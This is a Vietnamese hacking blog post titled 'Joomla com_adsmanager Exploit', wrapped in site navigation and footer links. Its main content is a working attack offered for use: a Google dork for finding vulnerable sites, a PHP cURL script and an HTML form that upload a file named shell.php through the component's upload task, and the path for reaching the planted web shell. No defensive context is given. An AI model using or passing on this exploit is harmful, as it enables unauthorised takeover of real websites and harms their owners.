• Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
  • Kiến thức
AnonyViet
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
  • Kiến thức
No Result
View All Result
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
  • Kiến thức
No Result
View All Result
AnonyViet
No Result
View All Result

Joomla com_adsmanager Exploit

AnonyViet by AnonyViet
09/12/2015 - Updated on 16/12/2020
in SQL Injection
1

Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org

CODE PHP :

Các bài viết liên quan

Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 13

Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất

14/05/2017 - Updated on 15/05/2017
Khai thác lỗ hổng Wordpress Plugin WP-Dreamworkgallery 3

Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery

01/04/2017 - Updated on 16/12/2020
Hướng dẫn khai thác lỗi CMS Upload Website 2017 10

Hướng dẫn khai thác lỗi CMS Upload Website 2017

11/01/2017 - Updated on 16/12/2020
<?php

$url = "site.com/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array
(
"file" => "@shell.jpg",
"name" => "shell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;

?>

#CSRF :

<form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

 

Acces Shell: site.com/tmp/plupload/shell.php

Xem thêm:  Dork SQL 2015
Tags: exploitjoomla
Previous Post

XSS Vulnerability

Next Post

Hướng dẫn Tạo tool hack disconect LoL

AnonyViet

AnonyViet

Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

Tool khai thác lỗi SQL Injection với SQLi Dumper v8.2 Full 8
SQL Injection

Download SQLi Dumper v10.1 Full – Tool khai thác lỗi SQL Injection

11/02/2020 - Updated on 16/12/2020
SQLMap v1.2.9 - Công cụ khai thác lỗ hổng SQL Injection mạnh nhất 1
SQL Injection

SQLMap v1.2.9 – Công cụ khai thác lỗ hổng SQL Injection mạnh nhất

11/09/2018 - Updated on 16/12/2020
Hướng dẫn code kiểm tra lỗ hổng bảo mật Sql Injection với Python script và cách phòng chống. 9
SQL Injection

Hướng dẫn code kiểm tra lỗ hổng bảo mật Sql Injection với Python script và cách phòng chống.

21/06/2017 - Updated on 16/12/2020
SQLI Hunter v1.2 - Tự động tìm lỗi SQL Injection
SQL Injection

SQLI Hunter v1.2 – Tự động tìm lỗi SQL Injection

27/12/2015 - Updated on 16/12/2020
Dork SQL 2015
SQL Injection

Dork SQL 2015

21/12/2015 - Updated on 16/12/2020
Hướng dẫn sử dụng SQLMap 2
SQL Injection

Hướng dẫn sử dụng SQLMap

10/12/2015 - Updated on 16/12/2020
Next Post
Hướng dẫn Tạo tool hack disconect LoL

Hướng dẫn Tạo tool hack disconect LoL

guest
guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

1 Comment
oldest
newest most voted
Inline Feedbacks
View all comments
Lâm Trung Tính | <span class="wpdiscuz-comment-count">948 comments</span>
Lâm Trung Tính | 948 comments
3 years ago

Nguyễn Lam để đây không biết chừng nào tới đây..hi..hi

0
Reply

Liên hệ Quảng Cáo

Lien he AnonyViet

Đối tác

Fshare

Các bài mới

Hot Deal! Giá bản quyền Windows 10 chỉ từ 130.000đ Sale off 62% 2

Hot Deal! Giá bản quyền Windows 10 chỉ từ 130.000đ Sale off 62%

21/01/2021
Tự động gửi tin nhắn hàng loạt trên Facebook Messenger 2021 3

Tự động gửi tin nhắn hàng loạt trên Facebook Messenger 2021

20/01/2021
duong dan khien windows bi loi (1)

Xuất hiện đường dẫn khiến Windows 10 bị treo ngay lập tức

19/01/2021
thay nhot honda mien phi

Hướng dẫn thay và nhận bình nhớt Honda miễn phí

19/01/2021
Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 4

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA

19/01/2021

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên kết

Game B52 |  Tải game đổi thưởng online | Chơi game bài hot 2020 | Chơi game bài đổi thưởng online | Gam Víp | 88vin link

Liên hệ đặt Ads: [email protected]

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

Bài viết mới

  • Hot Deal! Giá bản quyền Windows 10 chỉ từ 130.000đ Sale off 62%
  • Tự động gửi tin nhắn hàng loạt trên Facebook Messenger 2021
  • Xuất hiện đường dẫn khiến Windows 10 bị treo ngay lập tức
  • Hướng dẫn thay và nhận bình nhớt Honda miễn phí
  • Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA
  • Thư mục Home sẽ chuyển sang chế độ Private trong Ubuntu 21.04?
  • Giới thiệu về AnonyViet
  • Liên hệ Quảng cáo
  • Privacy & Policy
  • Contact

© 2019 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ.

No Result
View All Result
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Parrot
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
  • Kiến thức

© 2019 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ.

wpDiscuz